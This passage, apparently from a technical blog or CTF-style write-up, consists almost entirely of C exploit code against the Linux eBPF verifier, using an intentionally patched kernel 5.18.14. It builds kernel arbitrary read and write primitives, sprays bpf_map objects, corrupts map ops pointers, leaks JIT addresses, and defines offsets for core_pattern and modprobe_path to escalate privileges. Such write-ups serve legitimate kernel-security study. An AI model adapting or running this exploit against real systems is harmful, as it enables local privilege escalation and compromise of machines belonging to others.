      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                  -0x08),  // *(u64*)(fp-0x08) = skb

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x10
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // call map_lookup_elem(mapfd, &amp;amp;key(-&amp;gt;0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),  // r6 = r0 == map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,
                  0),  // r7 = [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),  // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp;amp;
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known -&amp;gt;
      // ___mark_reg_known is called.
      // By this calling then r1&amp;#39;s min and max will be imm.
      // Because (~0xffffffff00000001) &amp;amp; 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) &amp;amp; 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).
      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),  // r1(w1) = (s32_min=1, s32_max=0,
                                            // u32_min=1, u32_max=0).

      BPF_MOV64_REG(
          BPF_REG_2,
          BPF_REG_7),  // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_2,
                    0x1),  // r2 = (val=1, mask=0x1)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_2),  // r1 = r1 + r2 == (actual_val = 2; s32_min=1,
                                 // s32_max=1, u32_min=1, u32_max=1) ==
                                 // (actual_val=2; val=1, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_1,
                    -1),  // r1 = r1 + -1 == (actual_val=1; val=0, mask=0)
      BPF_MOV64_REG(BPF_REG_8,
                    BPF_REG_1),  // r8 = r1 == (actual_val=1; val=0, mask=0)

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = fp-0x20
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20),  // arg3 = arg3(fp)-0x20
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG3,
                  -0x18),  // *(u64*)(fp-0x18) = arg3 == fp-0x20
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_8),  // arg4 = r8 == (actual_val=1; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_MUL, BPF_REG_ARG4,
          0x10 - 1),  // arg4 = 0x0f * arg4 == (actual_val=0x0f; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          1),  // arg4 = arg4 + 1 == (actual_val=0x10; val=0x1, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0x10; val=0x1, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0x10),
      // arg3(to) = addr
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG3, BPF_REG_FP,
                  -0x18),  // arg3 = fp-0x18 == addr
      // arg4(len)
      BPF_MOV64_IMM(BPF_REG_ARG4, 8),
      // skb_load_bytes(skb, 0x10, addr, 8)
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
  if (progfd &amp;lt; 0) {
    puts(&amp;#34;============[failed reason]============&amp;#34;);
    printf(&amp;#34;%s\n&amp;#34;, verifier_log);
    fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal(&amp;#34;socketpair&amp;#34;);
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
    fatal(&amp;#34;setsockopt&amp;#34;);
  }

  uint64_t buf[] = {0xdeadbeefcafebebe, addr, val};
  write(socks[1], buf, sizeof(buf));

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  return buf[0];
}
uint64_t aar64(uint64_t addr) {
  char verifier_log[0x10000];

  uint64_t map_val = 1;
  bpf_map_update(mapfd, 0, &amp;amp;map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                  -0x08),  // *(u64*)(fp-0x08) = skb

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x10
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // call map_lookup_elem(mapfd, &amp;amp;key(-&amp;gt;0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),  // r6 = r0 == map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,
                  0),  // r7 = [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),  // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp;amp;
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known -&amp;gt;
      // ___mark_reg_known is called.
      // By this calling then r1&amp;#39;s min and max will be imm.
      // Because (~0xffffffff00000001) &amp;amp; 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) &amp;amp; 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).
      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),  // r1(w1) = (s32_min=1, s32_max=0,
                                            // u32_min=1, u32_max=0).

      BPF_MOV64_REG(
          BPF_REG_2,
          BPF_REG_7),  // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_2,
                    0x1),  // r2 = (val=1, mask=0x1)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_2),  // r1 = r1 + r2 == (actual_val = 2; s32_min=1,
                                 // s32_max=1, u32_min=1, u32_max=1) ==
                                 // (actual_val=2; val=1, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_1,
                    -1),  // r1 = r1 + -1 == (actual_val=1; val=0, mask=0)
      BPF_MOV64_REG(BPF_REG_8,
                    BPF_REG_1),  // r8 = r1 == (actual_val=1; val=0, mask=0)

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = fp-0x20
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20),  // arg3 = arg3(fp)-0x20
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_6,
                  -0x18),  // *(u64*)(fp-0x18) = arg3 == fp-0x20
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_8),  // arg4 = r8 == (actual_val=1; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_MUL, BPF_REG_ARG4,
          0x10 - 1),  // arg4 = 0x0f * arg4 == (actual_val=0x0f; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          1),  // arg4 = arg4 + 1 == (actual_val=0x10; val=0x1, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0x10; val=0x1, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(&amp;amp;key)
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // arg3(&amp;amp;val)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG3, BPF_REG_FP, -0x18),
      // arg4(flags)
      BPF_MOV64_IMM(BPF_REG_ARG4, 0),
      // map_update_elem(mapfd, &amp;amp;key, &amp;amp;val, 0)
      BPF_EMIT_CALL(BPF_FUNC_map_update_elem),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
  if (progfd &amp;lt; 0) {
    puts(&amp;#34;============[failed reason]============&amp;#34;);
    printf(&amp;#34;%s\n&amp;#34;, verifier_log);
    fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal(&amp;#34;socketpair&amp;#34;);
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
    fatal(&amp;#34;setsockopt&amp;#34;);
  }

  uint64_t buf[] = {0xdeadbeefcafebebe, addr};
  write(socks[1], buf, sizeof(buf));
  bpf_map_lookup(mapfd, 0, &amp;amp;map_val);

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  return map_val;
}

uint64_t bpf_map_addr = 0;

int main() {
  srand(time(NULL));
  char verifier_log[0x10000];

  make_corrupted_map();
  find_corrupted_map_and_leak_bpf_map_addr();

  if (corrupted_map_fd == 0) {
    puts(&amp;#34;[-] Failed to find corrupted bpf_map&amp;#34;);
    return -1;
  }
  printf(&amp;#34;[+] mapfd: %d\n&amp;#34;, mapfd);
  printf(&amp;#34;[+] corrupted_map_fd: %d\n&amp;#34;, corrupted_map_fd);
  printf(&amp;#34;[+] bpf_map_addr: 0x%016lx\n&amp;#34;, bpf_map_addr);

  puts(&amp;#34;[*] Restore corrupted map...&amp;#34;);
  uint64_t bpf_map_ops = aar64(bpf_map_addr) + 8;
  aaw64(bpf_map_addr, bpf_map_ops);

  return 0;
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;h4 id=&#34;leak-addr-of-jit-code-using-oob-read--heap-spray&#34;&gt;Leak addr of JIT code using oob read &amp;amp; heap spray&lt;/h4&gt;



  &lt;div class=&#34;collapsable-code&#34;&gt;
    &lt;input id=&#34;254613798&#34; type=&#34;checkbox&#34; checked /&gt;
    &lt;label for=&#34;254613798&#34;&gt;
      &lt;span class=&#34;collapsable-code__language&#34;&gt;c&lt;/span&gt;
      &lt;span class=&#34;collapsable-code__title&#34;&gt;leak_jit_addr_using_oob_read.c&lt;/span&gt;
      &lt;span class=&#34;collapsable-code__toggle&#34; data-label-expand=&#34;Show&#34; data-label-collapse=&#34;Hide&#34;&gt;&lt;/span&gt;
    &lt;/label&gt;
    &lt;pre class=&#34;language-c&#34; &gt;
      &lt;code&gt;// Patch location:
//    https://elixir.bootlin.com/linux/v5.18.14/source/kernel/bpf/verifier.c#L7957
// Diff:
//    7957c7957,7958
//    &amp;lt;               __mark_reg32_known(dst_reg, var32_off.value);
//    ---
//    &amp;gt;               // `scalar_min_max_or` will handler the case
//    &amp;gt;               //__mark_reg32_known(dst_reg, var32_off.value);

#include &amp;lt;asm-generic/socket.h&amp;gt;
#include &amp;lt;fcntl.h&amp;gt;
#include &amp;lt;linux/bpf.h&amp;gt;
#include &amp;lt;stdint.h&amp;gt;
#include &amp;lt;stdio.h&amp;gt;
#include &amp;lt;stdlib.h&amp;gt;
#include &amp;lt;string.h&amp;gt;
#include &amp;lt;sys/socket.h&amp;gt;
#include &amp;lt;sys/syscall.h&amp;gt;
#include &amp;lt;sys/types.h&amp;gt;
#include &amp;lt;time.h&amp;gt;
#include &amp;lt;unistd.h&amp;gt;

#include &amp;#34;bpf_insn.h&amp;#34;

#define KERNEL_BASE 0xffffffff81000000
#define BPF_MAP_OPS_OFFSET (0xffffffff81c124a0 - KERNEL_BASE)
#define BPF_MAP_OPS_LOOKUP_IDX 12
#define BPF_MAP_OPS_LOOKUP_ELEM_OFFSET \
  (BPF_MAP_OPS_OFFSET + BPF_MAP_OPS_LOOKUP_IDX * 8)
#define BPF_MAP_OPS_UPDATE_ELEM_IDX 13
#define BPF_MAP_OPS_UPDATE_ELEM_OFFSET \
  (BPF_MAP_OPS_OFFSET + BPF_MAP_OPS_UPDATE_ELEM_IDX * 8)
#define OPS_CONTAINING_RET_OFFSET (0xffffffff81c15fc8 - KERNEL_BASE)
#define CORE_PATTERN_OFFSET (0xffffffff81eb25e0 - KERNEL_BASE)
#define MODBPROB_OFFSET (0xffffffff81e37fe0 - KERNEL_BASE)

void get_enter_to_continue(const char* msg) {
  puts(msg);
  getchar();
}

void fatal(const char* msg) {
  perror(msg);
  // get_enter_to_continue(&amp;#34;Press enter to exit...&amp;#34;);
  exit(-1);
}

int bpf(int cmd, union bpf_attr* attrs) {
  return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs));
}

int bpf_map_create(int val_size, int max_entries) {
  union bpf_attr attr = {
      .map_type = BPF_MAP_TYPE_ARRAY,
      .key_size = sizeof(int),
      .value_size = val_size,
      .max_entries = max_entries,
  };

  int map_fd = bpf(BPF_MAP_CREATE, &amp;amp;attr);
  if (map_fd &amp;lt; 0) {
    fatal(&amp;#34;bpf(BPF_MAP_CREATE)&amp;#34;);
  }

  return map_fd;
}
int bpf_map_update(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&amp;amp;key,
      .value = (uint64_t)pval,
      .flags = BPF_ANY,
  };

  int res = bpf(BPF_MAP_UPDATE_ELEM, &amp;amp;attr);
  if (res &amp;lt; 0) {
    fatal(&amp;#34;bpf(BPF_MAP_UPDATE_ELEM)&amp;#34;);
  }

  return res;
}
int bpf_map_lookup(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&amp;amp;key,
      .value = (uint64_t)pval,
      .flags = BPF_ANY,
  };

  return bpf(BPF_MAP_LOOKUP_ELEM, &amp;amp;attr);
}

int mapfd;
int map_spray_fd[0x100];
void make_corrupted_map() {
  uint64_t map_val = 1;

  puts(&amp;#34;[*] Spray struct bpf_map...&amp;#34;);
  for (int i = 0; i &amp;lt; sizeof(map_spray_fd) / 4; i++) {
    map_spray_fd[i] = bpf_map_create(sizeof(uint64_t), 1);
    bpf_map_update(map_spray_fd[i], 0, &amp;amp;map_val);
  }
  mapfd = map_spray_fd[0x81];

  char verifier_log[0x10000];

  bpf_map_update(mapfd, 0, &amp;amp;map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                  -0x08),  // *(u64*)(fp-0x08) = skb

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x10
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // call map_lookup_elem(mapfd, &amp;amp;key(-&amp;gt;0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),  // r6 = r0 == map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,
                  0),  // r7 = [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),  // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp;amp;
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known -&amp;gt;
      // ___mark_reg_known is called.
      // By this calling then r1&amp;#39;s min and max will be imm.
      // Because (~0xffffffff00000001) &amp;amp; 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) &amp;amp; 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).
      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),  // r1(w1) = (s32_min=1, s32_max=0,
                                            // u32_min=1, u32_max=0).

      BPF_MOV64_REG(
          BPF_REG_2,
          BPF_REG_7),  // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_2,
                    0x1),  // r2 = (val=1, mask=0x1)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_2),  // r1 = r1 + r2 == (actual_val = 2; s32_min=1,
                                 // s32_max=1, u32_min=1, u32_max=1) ==
                                 // (actual_val=2; val=1, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_1,
                    -1),  // r1 = r1 + -1 == (actual_val=1; val=0, mask=0)
      BPF_MOV64_REG(BPF_REG_8,
                    BPF_REG_1),  // r8 = r1 == (actual_val=1; val=0, mask=0)

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = map_elem
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_6),  // arg3 = r6 == map_elem
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_8),  // arg4 = r8 == (actual_val=1; val=0, mask=0)
      BPF_ALU64_IMM(BPF_MUL, BPF_REG_ARG4,
                    0xf2 - 1),  // arg4 = (0xf2-1) * arg4 == (actual_val=0xf2-1;
                                // val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          1),  // arg4 = arg4 + 1 == (actual_val=0xf2; val=0x1, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0xf2; val=0x1, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
  if (progfd &amp;lt; 0) {
    puts(&amp;#34;============[failed reason]============&amp;#34;);
    printf(&amp;#34;%s\n&amp;#34;, verifier_log);
    fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal(&amp;#34;socketpair&amp;#34;);
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
    fatal(&amp;#34;setsockopt&amp;#34;);
  }

  char buf[0x100] = {
      0,
  };
  // Overwrite low byte of bpf_map-&amp;gt;ops
  // (https://elixir.bootlin.com/linux/v5.18.14/source/include/linux/bpf.h#L63)
  uint16_t ops_containing_ret_offset =
      (OPS_CONTAINING_RET_OFFSET - 8 * BPF_MAP_OPS_UPDATE_ELEM_IDX) &amp;amp; 0xffff;
  printf(&amp;#34;ops_containing_ret_offset: 0x%x\n&amp;#34;, ops_containing_ret_offset);
  *(uint16_t*)(&amp;amp;buf[0xf0]) = ops_containing_ret_offset;
  write(socks[1], buf, sizeof(buf));

  close(socks[0]);
  close(socks[1]);
  close(progfd);
}

int corrupted_map_fd;
uint64_t jit_addr;
void find_corrupted_map_and_leak_bpf_map_addr() {
  char verifier_log[0x10000];

  for (int i = 0; i &amp;lt; sizeof(map_spray_fd) / 4; ++i) {
    int cur_map_fd = map_spray_fd[i];
    if (cur_map_fd == mapfd) {
      continue;
    }

    // uint64_t map_val = 0;
    // int ret = bpf_map_update(cur_map_fd, 0, &amp;amp;map_val);
    // printf(&amp;#34;ret: 0x%x, val: 0x%lx\n&amp;#34;, ret, map_val);

    struct bpf_insn insns[] = {
        // BPF_REG_ARG1 == struct __sk_buff
        BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                    -0x08),  // *(u64*)(fp-0x08) = skb

        // arg1(mapfd)
        BPF_LD_MAP_FD(BPF_REG_ARG1, cur_map_fd),
        // arg2(&amp;amp;key) = fp-0x10 &amp;lt;- 0
        BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
        BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
        // arg3(&amp;amp;val) = fp-0x10 &amp;lt;- 0
        BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_ARG2),
        // arg4(flags)
        BPF_MOV64_IMM(BPF_REG_ARG4, 0),
        // map_update_elem(mapfd, fp-0x10, fp-0x10, 0) or map_lookup_elem(mapfd,
        // fp-0x10) if corrupted
        BPF_EMIT_CALL(BPF_FUNC_map_update_elem),
        BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_0, -0x18),

        // arg1(mapfd)
        BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
        // arg2(&amp;amp;key) = fp-0x10 &amp;lt;- 0
        BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
        BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
        // arg3(&amp;amp;val) = fp-0x18 &amp;lt;- return value of map_update_elem or
        // map_lookup_elem.
        BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x18),
        // arg4(flags)
        BPF_MOV64_IMM(BPF_REG_ARG4, 0),
        // map_update_elem(mapfd, fp-0x10, fp-0x18, 0)
        BPF_EMIT_CALL(BPF_FUNC_map_update_elem),

        BPF_MOV64_IMM(BPF_REG_0, 0),
        BPF_EXIT_INSN(),
    };

    union bpf_attr prog_attr = {
        .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
        .insn_cnt = sizeof(insns) / sizeof(insns[0]),
        .insns = (uint64_t)insns,
        .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
        .log_level = 2,
        .log_size = sizeof(verifier_log),
        .log_buf = (uint64_t)verifier_log,
    };

    int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
    if (progfd &amp;lt; 0) {
      puts(&amp;#34;============[failed reason]============&amp;#34;);
      printf(&amp;#34;%s\n&amp;#34;, verifier_log);
      fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
    }

    int socks[2];
    if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
      fatal(&amp;#34;socketpair&amp;#34;);
    }
    if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
      fatal(&amp;#34;setsockopt&amp;#34;);
    }

    write(socks[1], &amp;#34;Hello&amp;#34;, 5);

    uint64_t val;
    bpf_map_lookup(mapfd, 0, &amp;amp;val);

    close(socks[0]);
    close(socks[1]);
    close(progfd);

    if (val != 0) {
      jit_addr = val;
      corrupted_map_fd = cur_map_fd;
      return;
    }
  }
}

uint64_t aaw64(uint64_t addr, uint64_t val) {
  char verifier_log[0x10000];

  uint64_t map_val = 1;
  bpf_map_update(mapfd, 0, &amp;amp;map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                  -0x08),  // *(u64*)(fp-0x08) = skb

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x10
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // call map_lookup_elem(mapfd, &amp;amp;key(-&amp;gt;0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),  // r6 = r0 == map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,
                  0),  // r7 = [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),  // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
